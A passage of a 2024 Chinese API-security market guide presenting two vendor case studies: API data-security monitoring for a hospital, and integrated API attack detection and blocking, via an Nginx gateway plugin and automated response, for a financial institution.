5G、云计算、物联网等新兴技术与传统医疗系统的不断融合,医疗信息化程度不断提高,医疗数据呈爆发式增长,其蕴含的价值也随之提升。然而,这也带来了更多的数据安全风险。与此同时,国家、行业层面日趋完善的数据安全监管,使得医院数据安全建设面临更大挑战。某医院近年持续推进智慧医院建设,为了给患者提供更便捷的就医服务,通过 web 网站、微信公众号、第三方支付等方式进行信息发布、预约挂号、报告查询等服务,内网业务应用对外开放大量 API 用于数据共享交换;API 接口的使用在医院跨网、跨机构间的业务协同和数据共享中发挥着高效的支撑作用,帮助医院实现诊疗、服务、管理、运营的正常运转。但往往也成为了外部攻击者攻击医院内部网络的通道,对医院系统和敏感数据造成极大安全威胁。4.2.2防护目标API 接口全面梳理全量梳理API接口、识别僵尸API接口、涉敏API接口,完善API资产清单;敏感数据流动分析监测涉敏接口敏感数据流动去向,识别合理身份下的违规使用、滥用数据行为;安全风险审计溯源通过异常行为检测和分析技术对 API 接口潜在的脆弱性风险(涵盖 OWASP 18TOP10)、用户异常、行为异常等风险进行识别,并提供溯源处置方案;参照现行法律法规和行业标准,确保 API 开放与数据共享过程中所有环节符合网络安全法、个人信息保护法等相关法规要求。4.2.3防护方案通过在医院内网核心交换机旁路部署 1 台青笠 API 数据安全监测设备,对医院应用系统全量访问行为进行监测、分析,构建贯穿全安全运营周期事前梳理-事中监测-事后溯源的安全运营逻辑链;实现医院 API 资产可见、数据流动可视、安全风险可知可溯源。事前梳理:基于流量协议解析技术自动梳理庞杂的API接口,并进行分类、打标,完善 API 资产台账;事中监测:内置策略结合自定义专家策略实现对 API 脆弱性、用户异常、业务访问异常等安全风险进行识别。事后溯源:全量访问行为审计留存,促进风险事件快速溯源定责。4.2.4项目成果数据资产可见通过全流量监测解析、智能化梳理实现 API 资产的梳理,帮助某医院清晰的感知资产情况、敏感接口分布情况,为院方安全决策提供基础,提升院方针对应用访问行为监测、分析、溯源于一体的业务安全监测能力。数据流动可视通过多维度数据透出统计分析,细粒度监测数据流动趋势,帮助院方对内 API 安全市场指南|2024 19部业务数据流动、对外数据流动进行监测,识别合理身份下的数据非法使用、滥用行为,规避数据泄露风险。安全风险可知基于异常行为能力检测与分析能力,对接口脆弱性、用户异常、业务访问异常等行为进行检测,有效识别风险,并提供溯源、定位、处置能力,促进院方对风险事件的快速闭环管理。安全事件可溯源以全量访问日志记录为基础,集合多个维度的统计分析能力,帮助院方快速定位风险来源,分析风险事件主体,提供数据支撑,以及原始数据证据信息,满足合规需求。204.3某金融机构一体化 API 安全监测与防护本案例由安胜华信提供4.3.1项目背景随着互联网的高速发展,在数字经济快速发展的同时,API 已成为面向内外部业务输出、数据输出的重要载体,成为拉通业务 数据 应用的物质基础。API 置身其中,必须坚决维护网络安全,以国家安全观为指导,有效应对各种API 安全威胁和挑战,维护网络秩序,共建健康、安全的 API 经济生态。近年来,各大金融机构开始重视 API 安全风险,存量的安全运营架构中API 安全监测能力不足,无法及时发现业务逻辑漏洞风险,还出现过未授权访问批量获取敏感信息问题。金融机构把控安全运营的主流建设方向中,希望做到 API 安全细颗粒度监测,但是一天动辄成千上万的风险告警量,也无法进行有效处理,因此,建立一套具备 API安全检测能力的可持续运营体系迫在眉睫。4.3.2防护目标通过接入全业务流量,识别业务数据,建立业务风险规则和数据安全规则,形成 API 资产发现、涉敏数据防泄露、规则模型及风险识别处置等多个方面的效果,完成对 API 攻击行为和 API 数据泄露行为的风险识别,阻断攻击/异常行为,降低安全事件的发生。即,专注于:数据与业务强关联场景下数据使用和流动过程中参数级的感知、检测、监测、分析与处置。基于数据流量,动态提取 API 请求及响应数据,构建 API 数据资产。事前:对自动化、越权、绕过等 API 攻击行为分析,建立以 API 数据资产为核心的防护模型;事中:实时统计分析 IP、数据、访问行为等内容,匹配规则模型,对异 API 安全市场指南|2024 21常行为告警并阻断;事后:对留存的 API 访问记录审计分析,进一步优化检测模型,提升攻击/异常检测准确性。4.3.3防护方案本次申报案例的方案内容主要集中在 API 风险全面检测、告警实时处置、可持续运营三个方面。1、以 API 为技术角度,被动主动相结合,全面检测攻击行为通过对 API 业务数据中的请求和响应进行识别,提取访问源地址信息,分析攻击者以自动化破坏性手段对业务系统发起的攻击行为,以及通过绕过、越权、参数遍历等行为发起的获取数据的非破坏性攻击性行为。针对短期内无流量的 API,采用主动检测形式产生流量,构造异常访问进行风险检测。通过主动被动相结合的方式对以 API 访问的所有攻击行为进行全面分析。图 9API 安全测试自动化示意图2、插件部署,实现实时阻断,又不增加链路节点基于业务字段级别的全量数据留存,针对业务上下文关联分析以及多维度的数据下钻、数据检索等各种个性化分析,短时间内溯源到安全事件的关键信息,然后进行阻断处置或者联动处置。22网关插件以脚本的形式部署在业务系统网关 Nginx 上,访问请求信息经过网关时,脚本对访问请求信息进行拦截并解析,先发送给平台完成攻击行为分析,再将结果返回至插件,插件根据预设的交互条件确定通过还是拦截。为避免影响业务链路的访问时效性,可在插件中设置超时时间,当拦截的 API 请求在超时时间内未接受到平台对风险的响应结果,插件根据确定的目标地址继续向后发送请求。图 10插件部署模式示意图3、建立常态化运营机制,与三方系统联动,实现运营自动化项目在实施过程中,与自动化编排系统进行联动,平台根据风险级别,将风险数据输出给自动化编排系统。对外部系统,实施请求拦截或者将 IP 从防火墙上直接阻断,将损失减少到最低;对内部系统,首先下发整改通知,要求人员确认漏洞和验证,平台根据修复的结果持续验证。以此实现风险数据输出、风险联动处置及响应的完整机制和常态化的运营体系,为后续的安全运营项目提供建设性的指导意见和经验积累。API 安全市场指南|2024 23图 11安全运营体系化示意图4.3.4项目创新点项目创新点主要体现在三方面:一是覆盖范围方面,案例在数据攻击分析方面涵盖 API 自身运行风险及基于 API 发起攻击的风险,确保基于 API 的攻击风险和数据安全风险能够全面发现;二是部署方面,业务系统零改造,利用插件部署模式,既不增加链路节点又可实现攻击拦截,实现会话阻断处置;三是业务运营方面,互联网风险与自动化编排处置系统联动,实现风险自动化处置,内网风险与数智化运维平台联动,根据业务系统反馈情况再行处置,处置率达标。

    浏览量88人已浏览 发布时间2024-04-19 29页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
831条  共42
前往
客服
商务合作
小程序
服务号
会员动态
会员动态 会员动态:

wei**n_... 升级为标准VIP wei**n_... 升级为标准VIP

139**53... 升级为高级VIP wei**n_... 升级为标准VIP

wei**n_... 升级为标准VIP 188**75... 升级为标准VIP

wei**n_... 升级为至尊VIP 185**12... 升级为标准VIP

mi**c 升级为至尊VIP z** 升级为至尊VIP

bla**12... 升级为至尊VIP bla**12... 升级为标准VIP

191**37... 升级为至尊VIP wei**n_... 升级为至尊VIP

181**63... 升级为至尊VIP wei**n_... 升级为标准VIP

wei**n_... 升级为至尊VIP wei**n_... 升级为至尊VIP

ROS**LL 升级为标准VIP 138**15... 升级为至尊VIP

wei**n_... 升级为标准VIP 138**35... 升级为至尊VIP

156**19... 升级为至尊VIP 156**02... 升级为至尊VIP

177**17... 升级为标准VIP wei**n_... 升级为标准VIP

187**23... 升级为高级VIP 139**79... 升级为至尊VIP

wei**n_... 升级为标准VIP 173**43... 升级为高级VIP

wei**n_... 升级为标准VIP 风**... 升级为至尊VIP

188**96... 升级为高级VIP 138**87... 升级为标准VIP

摇**... 升级为高级VIP wei**n_... 升级为至尊VIP

wei**n_... 升级为高级VIP wei**n_... 升级为高级VIP

137**24... 升级为至尊VIP wei**n_... 升级为高级VIP

wei**n_... 升级为高级VIP wei**n_... 升级为至尊VIP

wei**n_... 升级为高级VIP wei**n_... 升级为标准VIP

wei**n_... 升级为标准VIP wei**n_... 升级为至尊VIP

wei**n_... 升级为标准VIP wei**n_... 升级为至尊VIP

158**10... 升级为标准VIP 186**81... 升级为高级VIP

wei**n_... 升级为至尊VIP 131**84... 升级为高级VIP

wei**n_... 升级为高级VIP wei**n_... 升级为高级VIP

郭** 升级为至尊VIP wei**n_... 升级为高级VIP

wei**n_... 升级为高级VIP wei**n_... 升级为标准VIP

彭**... 升级为高级VIP wei**n_... 升级为至尊VIP

137**80... 升级为至尊VIP wei**n_... 升级为高级VIP

173**26... 升级为高级VIP 186**02... 升级为至尊VIP

138**63... 升级为标准VIP 微**... 升级为标准VIP

wei**n_... 升级为至尊VIP 何**... 升级为至尊VIP

wei**n_... 升级为高级VIP 吴**... 升级为至尊VIP

木**c 升级为至尊VIP 微**... 升级为标准VIP

wei**n_... 升级为至尊VIP 微**... 升级为至尊VIP

大**... 升级为高级VIP wei**n_... 升级为至尊VIP

wei**n_... 升级为至尊VIP 136**87... 升级为标准VIP

wei**n_... 升级为高级VIP wei**n_... 升级为至尊VIP

wei**n_... 升级为高级VIP 137**85... 升级为标准VIP

wei**n_... 升级为高级VIP wei**n_... 升级为至尊VIP

135**81... 升级为至尊VIP wei**n_... 升级为高级VIP

137**39... 升级为高级VIP 185**26... 升级为至尊VIP

wei**n_... 升级为高级VIP jxf**yz 升级为至尊VIP

wei**n_... 升级为标准VIP wei**n_... 升级为标准VIP

wei**n_... 升级为标准VIP wei**n_... 升级为至尊VIP

185**63... 升级为至尊VIP 152**78... 升级为标准VIP

wei**n_... 升级为至尊VIP 182**56... 升级为至尊VIP

185**34... 升级为至尊VIP 185**34... 升级为标准VIP